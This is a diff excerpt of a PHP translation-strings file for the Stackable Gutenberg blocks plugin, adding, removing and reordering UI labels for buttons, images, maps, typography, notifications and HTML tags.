-__( 'Triggers animation or effects when you mouse over', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button Colors', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Min. Button Height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button Width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button Padding', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button padding', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the space between the button text and button borders', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button Size & Spacing', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Button Borders & Shadows', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Styles', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Conditional Display', 'stackable-ultimate-gutenberg-blocks' );
-__( 'When enabled, the last column will be cloned instead of adding a blank column.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Settings', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Allow Column Wrapping', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets column paddings, the space inside the block between the block elements and the column container border', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the distance between two or more columns', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Cover', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Custom Attributes', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Block Width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align Wide', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Align Full', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Content Width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Set the content to be smaller than the block width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Custom CSS', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Shape Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Shape Border Radius', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Shape Padding', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Shape Outline Width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Shape Outline Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Icon Shape', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Background Shape', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Motion Effects', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Select Image', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image Url', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Aspect Ratio', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Original', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Square 1:1', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Standard 4:3', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Classic 3:2', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Wide 16:9', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Cinematic 2:1', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Ultra Wide 3:1', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Panoramic 4:1', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Portrait 3:4', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Classic Portrait 2:3', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Tall 9:16', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the image width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the image height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Open Image in Lightbox', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image Alt', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Show Empty Alt Attribute', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Zoom', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image Shadow', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the intensity of the image shadow', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the radius of image corners to make them more rounded', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Overlay Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Overlay Opacity', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Overlay Blend Mode', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets how the overlay color blends with the image', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Focal point', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image Fit', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Contain', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Fill', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Scale Down', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the fit to default, contain, cover, fill, none, and scale down. Image fit specifies how an image resizes in a container.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image Shape', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Change the shape of the image', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Flip Shape Horizontally', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Flip Shape Vertically', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Stretch Shape Mask', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image Filter', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Image', 'stackable-ultimate-gutenberg-blocks' );
-__( 'When linked, styling this block would also style other linked blocks in adjacent columns.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Learn more about linking', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Progress Circle', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Progress Bar', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Progress', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Maximum Progress', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Apply border radius to bar', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Thickness', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bar Color #%s', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bar Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Gradient Direction (degrees)', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adv. Gradient Color Settings', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Gradient Direction', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the direction (in degrees) of the colors', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Color %d Location', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the placement of each color in relation to the other color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Background Gradient Blend Mode', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets how this background gradient/image blends into the other background', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Background Color', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Rounded', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Animate', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Accessibility Label', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Progress Bar Text', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Progress Prefix', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Progress Suffix', 'stackable-ultimate-gutenberg-blocks' );
-_x( '%s %d', 'Nth Title', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Wave', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Straight', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Slant', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Curve', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Design', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Separator Height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the height of the separator to stretch or compress vertically', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Separator Width', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Shadow / Outline', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Adjusts the intensity of the separator shadow and makes the separator more prominent', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Invert Design', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bring to Front', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Brings the separator layer in front of other block elements', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Top Separator', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bottom Separator', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Transform & Transition', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Map', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Embedded content from Google Map Platform.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Some map features require a Google API Key.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Add API key here.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Location', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Enter an address or location', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Enable Dragging', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Full Screen Button', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Map Type Buttons', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Street View Button', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Zoom Buttons', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Map Style', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Custom Map Style (Paste JSON here)', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Learn how to use Custom Map Styles', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Map Marker', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Uploaded Icon and Icon Color settings are not fully compatible.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Horizontal Icon Anchor Point', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Vertical Icon Anchor Point', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Map Example', 'Map Example Text', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Type in a pair of latitude longitude coordinates. You can also type in the name of the location if your API Key has Geocoding API and Places API enabled.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Silver', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Retro', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Dark', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Night', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Aubergine', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Embedded content from Google Maps Platform.', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Use theme heading margins', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Font Family', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Theme Default', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the font set to be used for the element', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Weight', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Normal', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Bold', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Font weight', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the thinness or thickness of text characters', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Transform', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Uppercase', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Lowercase', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Capitalize', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the usage of upper or lower case', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Font Style', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Italic', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Oblique', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Line-Height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Line height', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the vertical distance between lines of text', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Letter Spacing', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Letter spacing', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the distance or space between letters', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Font size', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Sets the size of text characters', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Play Video', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Popup Option #1: Upload Video', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Use .mp4 format for videos', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Popup Option #2: Video URL', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Paste a Youtube / Vimeo URL', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Allow fullscreen', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Allow download video', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Loop video', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Note: The following attributes are used to create the video schema.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Video name', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Video description', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Video upload date', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Pill', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Remove', 'stackable-ultimate-gutenberg-blocks' );
 __( '#%s (no title)', 'stackable-ultimate-gutenberg-blocks' );
 __( 'No posts found', 'stackable-ultimate-gutenberg-blocks' );
@@ -894,16 +674,15 @@
 __( 'Space Evenly', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Stretch', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Baseline', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Unit', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Normal State', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Hovered State', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Parent Container Hovered State', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Collapsed', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Parent Hovered', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Add a Container Background to a parent block to enable this state.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align Left', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align Center', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Align Right', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Justified', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Normal', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Multiply', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Screen', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Overlay', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Darken', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Lighten', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Color Dodge', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Color Burn', 'stackable-ultimate-gutenberg-blocks' );
@@ -918,6 +697,25 @@
 __( 'Inherit', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Unset', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Mix Blend Mode', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Notification Type', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Success', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Error', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Warning', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Information', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Dismissible', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Icon Size', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Close', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Side', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Bordered', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Outlined', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Large Icon', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Unit', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Normal State', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Hovered State', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Parent Container Hovered State', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Collapsed', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Parent Hovered', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Add a Container Background to a parent block to enable this state.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Block Style', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Block Styles', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Save the styles of this block to reuse on others. You can also update a saved style, and the changes will apply wherever it's used.', 'stackable-ultimate-gutenberg-blocks' );
@@ -926,9 +724,11 @@
 __( 'Edit', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Global Gradients', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Global Colors', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Background Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Heading Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Link Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Accent Color', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Button Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Button Text Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Button Outline Color', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Change the color scheme.', 'stackable-ultimate-gutenberg-blocks' );
@@ -938,20 +738,22 @@
 __( 'Column Widths', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Group into Container', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Ungroup from Container', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Custom Attributes', 'stackable-ultimate-gutenberg-blocks' );
 __( 'You can type in custom HTML attributes for this block in the field above.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Example:', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Learn more about Custom Attributes', 'stackable-ultimate-gutenberg-blocks' );
 __( 'There is an error in your custom attribute', 'stackable-ultimate-gutenberg-blocks' );
+_x( '%s %d', 'Nth Title', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Wave', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Straight', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Slant', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Curve', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Rounded', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Layout', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Dynamic Fields', 'stackable-ultimate-gutenberg-blocks' );
-__( 'System Fonts', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Modern Font Stacks', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Google Fonts', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Theme Fonts', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Font Size', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Default Heading', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Default Body', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Font Size', 'stackable-ultimate-gutenberg-blocks' );
-__( 'auto', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Individual sides', 'stackable-ultimate-gutenberg-blocks' );
 __( 'All sides', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Top and Bottom', 'stackable-ultimate-gutenberg-blocks' );
@@ -960,10 +762,17 @@
 __( 'Top Right', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Bottom Left', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Bottom Right', 'stackable-ultimate-gutenberg-blocks' );
+__( 'System Fonts', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Modern Font Stacks', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Google Fonts', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Theme Fonts', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Font Family', 'stackable-ultimate-gutenberg-blocks' );
 __( 'There are no blocks in this group, please add one.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Add Block', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Paragraph', 'stackable-ultimate-gutenberg-blocks' );
+__( 'auto', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Stop showing tooltips', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Paragraph', 'stackable-ultimate-gutenberg-blocks' );
+_x( '%s HTML Tag', 'component', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Type to search icon', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Icon Settings', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Upload SVG', 'stackable-ultimate-gutenberg-blocks' );
@@ -975,6 +784,8 @@
 __( 'preview', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Upload', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Replace', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Circle', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Blob %s', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Blur', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Brightness', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Contrast', 'stackable-ultimate-gutenberg-blocks' );
@@ -983,8 +794,6 @@
 __( 'Invert', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Saturate', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Sepia', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Circle', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Blob %s', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Click on any inner block in the editor to style it.', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Back', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Duplicate', 'stackable-ultimate-gutenberg-blocks' );
@@ -995,11 +804,7 @@
 __( 'layout', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Designs', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Pick a design to start from, this will override your block settings', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Layout Tab', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Style', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Style Tab', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Advanced', 'stackable-ultimate-gutenberg-blocks' );
-__( 'Advanced Tab', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Settings', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Get More Image Shapes', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Mask images with a variety of blob-like shapes', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Choose from over 50 different shapes', 'stackable-ultimate-gutenberg-blocks' );
@@ -1067,6 +872,14 @@
 __( 'Learn More', 'stackable-ultimate-gutenberg-blocks' );
 __( 'View Demo', 'stackable-ultimate-gutenberg-blocks' );
 __( 'You can hide premium hints in the settings', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Layout Tab', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Style', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Style Tab', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Advanced', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Advanced Tab', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Auto', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Column', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Image', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Desktop', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Tablet', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Mobile', 'stackable-ultimate-gutenberg-blocks' );
@@ -1077,6 +890,7 @@
 __( 'Advanced Shadow Options', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Custom', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Shadow Settings', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Shadow / Outline', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Shadow/Outline', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Adjusts the intensity of the shadow/outline of the block and the appearance of the block border', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Column Arrangement', 'stackable-ultimate-gutenberg-blocks' );
@@ -1091,6 +905,105 @@
 __( 'Taxonomy Filter Type', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Included In', 'stackable-ultimate-gutenberg-blocks' );
 __( 'Not In', 'stackable-ultimate-gutenberg-blocks' );
+__( 'URL', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the font set to be used for the element', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Font size', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the size of text characters', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Weight', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Bold', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Font weight', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the thinness or thickness of text characters', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Transform', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Uppercase', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Lowercase', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Capitalize', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the usage of upper or lower case', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Line-Height', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Line height', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the vertical distance between lines of text', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Letter Spacing', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Letter spacing', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the distance or space between letters', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Opens in new tab', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Nofollow link', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sponsored', 'stackable-ultimate-gutenberg-blocks' );
+__( 'UGC', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Search or type url', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Select a variation to start with.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Upgrade to Premium to get more design variations.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Content Min. Height', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Content Max Width', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Content Horizontal Align', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the placement of the column container to left, center or right. Not available when block width is set to full width.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Adjusts the placement of all content in the block to align left, center or right', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the horizontal position and spacing of the inner columns.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Column contents need to be narrow for effect to show.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the vertical position of the inner columns relative to the columns block.', 'stackable-ultimate-gutenberg-blocks' );
+__( '%s Direction', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Inner Block', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the horizontal/vertical position and spacing of the inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Aligns the horizontal/vertical position of the inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Set Content Min. Height for alignment to display properly', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Inner Block Wrapping', 'stackable-ultimate-gutenberg-blocks' );
+__( '%s %s', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the gap between the columns of inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the gap between inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Sets the gap between the rows of inner blocks.', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Supports links to images, videos, YouTube, Vimeo, and web pages that allow embedding. Opens inner image block if no link is provided', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Block Size & Spacing', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Background', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Color Scheme', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Borders & Shadows', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Address', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Article', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Aside', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Blockquote', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Div', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Details', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Footer', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Header', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Hgroup', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Main', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Nav', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Section', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+_x( 'Summary', 'HTML Tag', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Block', 'stackable-ultimate-gutenberg-blocks' );
+__( 'Overflow', 'stackable-ultimate-gutenberg-blocks' );
